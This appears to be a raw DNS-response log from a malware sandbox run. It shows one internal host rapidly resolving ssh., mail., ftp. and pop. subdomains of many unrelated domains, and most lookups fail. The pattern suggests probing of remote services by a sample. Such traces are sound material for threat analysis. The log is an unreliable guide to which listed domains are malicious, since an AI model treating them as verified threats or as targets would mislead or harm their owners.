Dec 22, 2023 21:14:55.099935055 CET	1.1.1.1	192.168.2.4	0x66ee	No error (0)	dzgxcfyd2rxse.cloudfront.net		13.35.116.41	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.099935055 CET	1.1.1.1	192.168.2.4	0x66ee	No error (0)	dzgxcfyd2rxse.cloudfront.net		13.35.116.62	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.099935055 CET	1.1.1.1	192.168.2.4	0x66ee	No error (0)	dzgxcfyd2rxse.cloudfront.net		13.35.116.98	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.101883888 CET	1.1.1.1	192.168.2.4	0x63f5	No error (0)	www.51goabroad.com		38.177.197.58	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.101897955 CET	1.1.1.1	192.168.2.4	0x63f5	No error (0)	www.51goabroad.com		38.177.197.58	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.102561951 CET	1.1.1.1	192.168.2.4	0x30cb	Name error (3)	srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.102652073 CET	1.1.1.1	192.168.2.4	0x30cb	Name error (3)	srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.113807917 CET	1.1.1.1	192.168.2.4	0xcf29	Name error (3)	piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.114360094 CET	1.1.1.1	192.168.2.4	0x96f2	Name error (3)	mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.121360064 CET	1.1.1.1	192.168.2.4	0x9a36	No error (0)	www.pcfocus.com.hk		218.213.216.3	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.121406078 CET	1.1.1.1	192.168.2.4	0x9a36	No error (0)	www.pcfocus.com.hk		218.213.216.3	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.283648014 CET	1.1.1.1	192.168.2.4	0x16f0	Name error (3)	rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.283840895 CET	1.1.1.1	192.168.2.4	0x16f0	Name error (3)	rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.377779961 CET	1.1.1.1	192.168.2.4	0x2ded	Name error (3)	mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.377873898 CET	1.1.1.1	192.168.2.4	0x2ded	Name error (3)	mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.543271065 CET	1.1.1.1	192.168.2.4	0xdba4	Name error (3)	ssh.bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.579817057 CET	1.1.1.1	192.168.2.4	0xd59c	Name error (3)	ssh.asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.621635914 CET	1.1.1.1	192.168.2.4	0xbdf9	Name error (3)	ssh.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.702064991 CET	1.1.1.1	192.168.2.4	0x52e4	Name error (3)	e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.863276958 CET	1.1.1.1	192.168.2.4	0xf6ac	Name error (3)	ssh.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.927527905 CET	1.1.1.1	192.168.2.4	0xf6ac	Name error (3)	ssh.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.931586981 CET	1.1.1.1	192.168.2.4	0xed48	Name error (3)	ftp.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.932180882 CET	1.1.1.1	192.168.2.4	0xb574	Name error (3)	ssh.rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.944408894 CET	1.1.1.1	192.168.2.4	0xcfa2	Name error (3)	mail.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.969399929 CET	1.1.1.1	192.168.2.4	0x6985	Name error (3)	ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.969899893 CET	1.1.1.1	192.168.2.4	0x4456	Name error (3)	sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.971302986 CET	1.1.1.1	192.168.2.4	0x8c0c	Name error (3)	saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.972784996 CET	1.1.1.1	192.168.2.4	0x93d5	Name error (3)	ssh.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.972795963 CET	1.1.1.1	192.168.2.4	0x1298	Name error (3)	ssh.e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.976268053 CET	1.1.1.1	192.168.2.4	0xe6f6	Name error (3)	ssh.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.006505013 CET	1.1.1.1	192.168.2.4	0x552d	Name error (3)	joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.013550997 CET	1.1.1.1	192.168.2.4	0x7b77	Name error (3)	ssh.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.015319109 CET	1.1.1.1	192.168.2.4	0x2243	Name error (3)	ssh.chemcaregroup.compg	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.035198927 CET	1.1.1.1	192.168.2.4	0xdc2f	Name error (3)	ssh.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.036062956 CET	1.1.1.1	192.168.2.4	0x1803	Name error (3)	pop.e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.037136078 CET	1.1.1.1	192.168.2.4	0x2809	Name error (3)	mail.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.051199913 CET	1.1.1.1	192.168.2.4	0x2cbe	Name error (3)	pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.066669941 CET	1.1.1.1	192.168.2.4	0xa3c5	Name error (3)	freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.081032991 CET	1.1.1.1	192.168.2.4	0x4b62	Name error (3)	154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.084021091 CET	1.1.1.1	192.168.2.4	0x4283	Name error (3)	9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.084739923 CET	1.1.1.1	192.168.2.4	0x1254	Name error (3)	ssh.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.085028887 CET	1.1.1.1	192.168.2.4	0x297c	Name error (3)	ssh.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.087609053 CET	1.1.1.1	192.168.2.4	0x9e80	Name error (3)	ssh.acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.087620020 CET	1.1.1.1	192.168.2.4	0x98c1	Name error (3)	ssh.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.088958979 CET	1.1.1.1	192.168.2.4	0x7fd6	Name error (3)	cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.089248896 CET	1.1.1.1	192.168.2.4	0x432f	Name error (3)	ssh.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.095979929 CET	1.1.1.1	192.168.2.4	0xe6f6	Name error (3)	ssh.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.109144926 CET	1.1.1.1	192.168.2.4	0xda55	Name error (3)	dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.142147064 CET	1.1.1.1	192.168.2.4	0x2809	Name error (3)	mail.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.151097059 CET	1.1.1.1	192.168.2.4	0xb82	Name error (3)	hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.153707981 CET	1.1.1.1	192.168.2.4	0xd1e7	Name error (3)	ssh.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.205841064 CET	1.1.1.1	192.168.2.4	0x297c	Name error (3)	ssh.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.206697941 CET	1.1.1.1	192.168.2.4	0x4b62	Name error (3)	154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.206729889 CET	1.1.1.1	192.168.2.4	0x432f	Name error (3)	ssh.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.206831932 CET	1.1.1.1	192.168.2.4	0x7fd6	Name error (3)	cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.223201990 CET	1.1.1.1	192.168.2.4	0x1ec6	Name error (3)	ssh.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.248538017 CET	1.1.1.1	192.168.2.4	0xb82	Name error (3)	hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.249373913 CET	1.1.1.1	192.168.2.4	0xd1e7	Name error (3)	ssh.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.256649017 CET	1.1.1.1	192.168.2.4	0xb920	Name error (3)	earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.297051907 CET	1.1.1.1	192.168.2.4	0x6b2e	Name error (3)	gpa.orgau	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.297127008 CET	1.1.1.1	192.168.2.4	0x6b4b	Name error (3)	mailgate.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.299521923 CET	1.1.1.1	192.168.2.4	0x1316	Name error (3)	mail.e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.302723885 CET	1.1.1.1	192.168.2.4	0xcf67	Name error (3)	smartiebritches-com.mail.protection.outlook.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.326337099 CET	1.1.1.1	192.168.2.4	0xa6a7	Name error (3)	daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.332974911 CET	1.1.1.1	192.168.2.4	0xc6af	Name error (3)	nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.335894108 CET	1.1.1.1	192.168.2.4	0xae93	Name error (3)	ssh.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.346240997 CET	1.1.1.1	192.168.2.4	0x4349	Name error (3)	ssh.gpa.orgau	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.346576929 CET	1.1.1.1	192.168.2.4	0xe0bb	Name error (3)	ssh.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.346699953 CET	1.1.1.1	192.168.2.4	0x509f	Name error (3)	ssh.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.366520882 CET	1.1.1.1	192.168.2.4	0xfa7e	Name error (3)	firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.367289066 CET	1.1.1.1	192.168.2.4	0xcf53	Name error (3)	dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.367949963 CET	1.1.1.1	192.168.2.4	0x53c5	Name error (3)	ssh.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.374401093 CET	1.1.1.1	192.168.2.4	0x4ef	Name error (3)	mail.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.374752998 CET	1.1.1.1	192.168.2.4	0xe8e6	Name error (3)	ssh.mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.376182079 CET	1.1.1.1	192.168.2.4	0xcee3	Name error (3)	ftp.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.386382103 CET	1.1.1.1	192.168.2.4	0x7102	Name error (3)	ssh.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.395234108 CET	1.1.1.1	192.168.2.4	0x3c5f	Name error (3)	mailgate.valentinegrowers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.400038004 CET	1.1.1.1	192.168.2.4	0x55b6	Name error (3)	ssh.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.400712013 CET	1.1.1.1	192.168.2.4	0xc6af	Name error (3)	nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.401690960 CET	1.1.1.1	192.168.2.4	0xcf67	Name error (3)	smartiebritches-com.mail.protection.outlook.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.409938097 CET	1.1.1.1	192.168.2.4	0x6ad0	Name error (3)	gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.419866085 CET	1.1.1.1	192.168.2.4	0xd9ec	Name error (3)	ssh.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.457901955 CET	1.1.1.1	192.168.2.4	0x3c5f	Name error (3)	mailgate.valentinegrowers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.470731020 CET	1.1.1.1	192.168.2.4	0x2a8e	Name error (3)	asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.475419998 CET	1.1.1.1	192.168.2.4	0x4f6b	Name error (3)	integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.477912903 CET	1.1.1.1	192.168.2.4	0x7f6b	Name error (3)	sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.525296926 CET	1.1.1.1	192.168.2.4	0x46f8	Name error (3)	ftp.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.532546043 CET	1.1.1.1	192.168.2.4	0x46f8	Name error (3)	ftp.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.532757998 CET	1.1.1.1	192.168.2.4	0xd9ec	Name error (3)	ssh.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.533102989 CET	1.1.1.1	192.168.2.4	0x55b6	Name error (3)	ssh.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.533706903 CET	1.1.1.1	192.168.2.4	0x6ad0	Name error (3)	gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.578622103 CET	1.1.1.1	192.168.2.4	0xe01b	Name error (3)	excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.578701973 CET	1.1.1.1	192.168.2.4	0xe01b	Name error (3)	excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.600035906 CET	1.1.1.1	192.168.2.4	0x7f6b	Name error (3)	sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.600899935 CET	1.1.1.1	192.168.2.4	0x4f6b	Name error (3)	integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.057003021 CET	1.1.1.1	192.168.2.4	0x217b	No error (0)	accounts.google.com		172.217.3.77	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.057090998 CET	1.1.1.1	192.168.2.4	0xb44f	Name error (3)	mail.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.148458958 CET	1.1.1.1	192.168.2.4	0x6d64	Name error (3)	mail.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.169051886 CET	1.1.1.1	192.168.2.4	0x10d9	Name error (3)	caribbean360-com.p30.spamhero.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.181303978 CET	1.1.1.1	192.168.2.4	0x71c3	Name error (3)	ssh.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.188756943 CET	1.1.1.1	192.168.2.4	0xeae8	Name error (3)	pop.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.216289997 CET	1.1.1.1	192.168.2.4	0x10d9	Name error (3)	caribbean360-com.p30.spamhero.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.268332958 CET	1.1.1.1	192.168.2.4	0x756c	Name error (3)	ssh.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.269396067 CET	1.1.1.1	192.168.2.4	0xa0dc	Name error (3)	mail.nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.271008968 CET	1.1.1.1	192.168.2.4	0x36d5	No error (0)	www.flandria-loisirs.com		91.132.253.137	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.271042109 CET	1.1.1.1	192.168.2.4	0x36d5	No error (0)	www.flandria-loisirs.com		91.132.253.137	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.283524036 CET	1.1.1.1	192.168.2.4	0xced7	Name error (3)	mail.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.293246984 CET	1.1.1.1	192.168.2.4	0x71c3	Name error (3)	ssh.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.326565027 CET	1.1.1.1	192.168.2.4	0x763a	No error (0)	www.wika.com	cloudcdn.wika.de		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:57.326565027 CET	1.1.1.1	192.168.2.4	0x763a	No error (0)	cloudcdn.wika.de	www.wika.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:57.333419085 CET	1.1.1.1	192.168.2.4	0xc85	Name error (3)	mail.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.333520889 CET	1.1.1.1	192.168.2.4	0xc85	Name error (3)	mail.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.345371962 CET	1.1.1.1	192.168.2.4	0x4e4b	Name error (3)	ssh.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.355026007 CET	1.1.1.1	192.168.2.4	0xa0dc	Name error (3)	mail.nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.355674982 CET	1.1.1.1	192.168.2.4	0x3302	Name error (3)	caribbean360-com.p40.spamhero.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.359674931 CET	1.1.1.1	192.168.2.4	0xbfe3	Name error (3)	ssh.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.385349989 CET	1.1.1.1	192.168.2.4	0x478e	Name error (3)	mail.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.391051054 CET	1.1.1.1	192.168.2.4	0xced7	Name error (3)	mail.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.391136885 CET	1.1.1.1	192.168.2.4	0x3302	Name error (3)	caribbean360-com.p40.spamhero.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.429420948 CET	1.1.1.1	192.168.2.4	0x2855	Name error (3)	ssh.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.442672014 CET	1.1.1.1	192.168.2.4	0x2855	Name error (3)	ssh.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.445024014 CET	1.1.1.1	192.168.2.4	0x1ed9	Name error (3)	ssh.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.464777946 CET	1.1.1.1	192.168.2.4	0x4e4b	Name error (3)	ssh.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.465029001 CET	1.1.1.1	192.168.2.4	0x478e	Name error (3)	mail.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.476458073 CET	1.1.1.1	192.168.2.4	0xed3b	Name error (3)	pop3.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.478019953 CET	1.1.1.1	192.168.2.4	0xf900	Name error (3)	relay.maroonshockey.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.509222031 CET	1.1.1.1	192.168.2.4	0x6deb	Name error (3)	smtp.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.613207102 CET	1.1.1.1	192.168.2.4	0xed3b	Name error (3)	pop3.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.625353098 CET	1.1.1.1	192.168.2.4	0x6deb	Name error (3)	smtp.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.740348101 CET	1.1.1.1	192.168.2.4	0x51f7	Name error (3)	ssh.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.835473061 CET	1.1.1.1	192.168.2.4	0x14b5	Name error (3)	ssh.demarillac.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.870632887 CET	1.1.1.1	192.168.2.4	0xce11	Name error (3)	ssh.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.915863037 CET	1.1.1.1	192.168.2.4	0xb1fe	Name error (3)	ssh.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.915874958 CET	1.1.1.1	192.168.2.4	0xb1fe	Name error (3)	ssh.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.376672029 CET	1.1.1.1	192.168.2.4	0xb3a8	Server failure (2)	ftp.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.376703024 CET	1.1.1.1	192.168.2.4	0xb3a8	Server failure (2)	ftp.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.376713991 CET	1.1.1.1	192.168.2.4	0xb3a8	Server failure (2)	ftp.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.715533018 CET	1.1.1.1	192.168.2.4	0x26e6	Name error (3)	ssh.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.782289982 CET	1.1.1.1	192.168.2.4	0x26e6	Name error (3)	ssh.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.804529905 CET	1.1.1.1	192.168.2.4	0x5bdb	Server failure (2)	distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.804542065 CET	1.1.1.1	192.168.2.4	0x5bdb	Server failure (2)	distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.804568052 CET	1.1.1.1	192.168.2.4	0x5bdb	Server failure (2)	distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.873740911 CET	1.1.1.1	192.168.2.4	0xcaaf	Name error (3)	ftp.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.880933046 CET	1.1.1.1	192.168.2.4	0xd5e7	Name error (3)	mail.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.886428118 CET	1.1.1.1	192.168.2.4	0xd986	Name error (3)	mail.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.887438059 CET	1.1.1.1	192.168.2.4	0x5ad	Name error (3)	ftp.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.891928911 CET	1.1.1.1	192.168.2.4	0x467	Name error (3)	mail.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.901397943 CET	1.1.1.1	192.168.2.4	0x985a	Name error (3)	pop.acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.908317089 CET	1.1.1.1	192.168.2.4	0x5713	Name error (3)	ftp.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.912606001 CET	1.1.1.1	192.168.2.4	0x72b7	Name error (3)	ftp.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.915090084 CET	1.1.1.1	192.168.2.4	0x8b82	Name error (3)	ftp.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.915687084 CET	1.1.1.1	192.168.2.4	0x7255	Name error (3)	ftp.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.922028065 CET	1.1.1.1	192.168.2.4	0x390e	Name error (3)	mail.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.924194098 CET	1.1.1.1	192.168.2.4	0x3161	Name error (3)	ftp.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.936630964 CET	1.1.1.1	192.168.2.4	0x2e19	Name error (3)	ssh.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.937990904 CET	1.1.1.1	192.168.2.4	0x7caf	Name error (3)	mail.mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.939147949 CET	1.1.1.1	192.168.2.4	0x291b	Name error (3)	ssh.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.946986914 CET	1.1.1.1	192.168.2.4	0x9c55	Name error (3)	ftp.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.951402903 CET	1.1.1.1	192.168.2.4	0xb20	Name error (3)	mail.arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.954257011 CET	1.1.1.1	192.168.2.4	0x2d34	Name error (3)	mail.chemcaregroup.compg	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.955037117 CET	1.1.1.1	192.168.2.4	0xa4eb	Name error (3)	mail.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.955317020 CET	1.1.1.1	192.168.2.4	0xc2c6	Name error (3)	ftp.arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.955737114 CET	1.1.1.1	192.168.2.4	0x371b	Name error (3)	ssh.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.961386919 CET	1.1.1.1	192.168.2.4	0x5ac8	Name error (3)	mail.gpa.orgau	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.967431068 CET	1.1.1.1	192.168.2.4	0x495	Name error (3)	mail.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.967829943 CET	1.1.1.1	192.168.2.4	0xac14	Name error (3)	mail.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.971386909 CET	1.1.1.1	192.168.2.4	0xc541	Name error (3)	mail.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.973174095 CET	1.1.1.1	192.168.2.4	0x252f	Name error (3)	mail.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.973735094 CET	1.1.1.1	192.168.2.4	0x17	Name error (3)	ftp.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.975886106 CET	1.1.1.1	192.168.2.4	0x79ee	Name error (3)	ssh.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.977963924 CET	1.1.1.1	192.168.2.4	0xbf38	Name error (3)	mail.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.984934092 CET	1.1.1.1	192.168.2.4	0x9350	Name error (3)	mail.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
